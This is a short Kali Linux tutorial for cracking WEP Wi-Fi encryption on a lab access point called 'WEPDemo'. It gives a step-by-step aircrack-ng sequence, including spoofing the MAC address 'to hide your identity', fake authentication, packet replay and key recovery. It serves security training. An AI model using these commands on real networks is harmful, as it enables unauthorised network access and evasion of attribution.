Cracking WEP in Kali Linux 2.0 has become extrememly easy. Open WiFite from the Applications menu and at the prompt type:
wifite –wep
Follow the onscreen instructions and the work is done for you.
WEP cracking instructions for Kali Linux 1.0
>>>Open a new terminal window
airmon-ng
# Will show you a list of your available wireless interfaces
# Note the name of your wireless interface, normally wlan0 or mon0
airmon-ng stop wlan0
# Stops the airmon-ng daemon
ifconfig wlan0 down
# stops the wireless interface
macchanger –mac 00:11:22:33:44:55 wlan0
# Spoofs your MAC address to hide your identity
airmon-ng start wlan0
# Starts the airmon-ng daemon
airodump-ng wlan0
# Locate available wireless access points to attack
# For our lab, look for WEPDEmo and note BSSID(MAC) and channel
airodump-ng -c 6 -w wepdemoattack –bssid 20:AA:4B:8B:A4:6E wlan0
# Start monitoring WEPDEmo for for associations to attempt to crack
# -c 6 specifies the channel
# -w wepdemoattack specifies the name of the file to save as
# –bssid 20:AA:4B:8B:A4:6E the MAC of the access point you are attacking
# wlan0 the wireless card you are monitoring with
>>>>Open a new terminal window
aireplay-ng -1 0 -a 20:AA:4B:8B:A4:6E -h 00:11:22:33:44:55 -e WEPDEmo wlan0
# Attempt to associate with the wireless access point
# -1 0 This is the number 1 and specifies the type of attack, fake authentication and # delay
# -a is the MAC of the access point being attacked
# -h is the spoofed MAC of our system
# -e is the access points SSID
# wlan0 is the interface we are attacking with
aireplay-ng -3 -b 20:AA:4B:8B:A4:6E -h 00:11:22:33:44:55 wlan0
#Will send traffic to the access point and monitor
aircrack-ng -b 20:AA:4B:8B:A4:6E wepdemoattack-01.cap
# Will attempt to crack the WEP encryption that has been detected so far
# Will check as you run it and then every 5000 ISVs – listed as #Data on the airodump # terminal
>>>>Open a new terminal window
aireplay-ng -1 0 -a 20:AA:4B:8B:A4:6E -h 00:11:22:33:44:55 -e WEPDEmo wlan0
#Repeatedly run this to attempt to generate more traffic to speed up the attack
Eventually on the aircrack-ng screen you should see the correct WEP key
26:27:F6:85:97 for my demo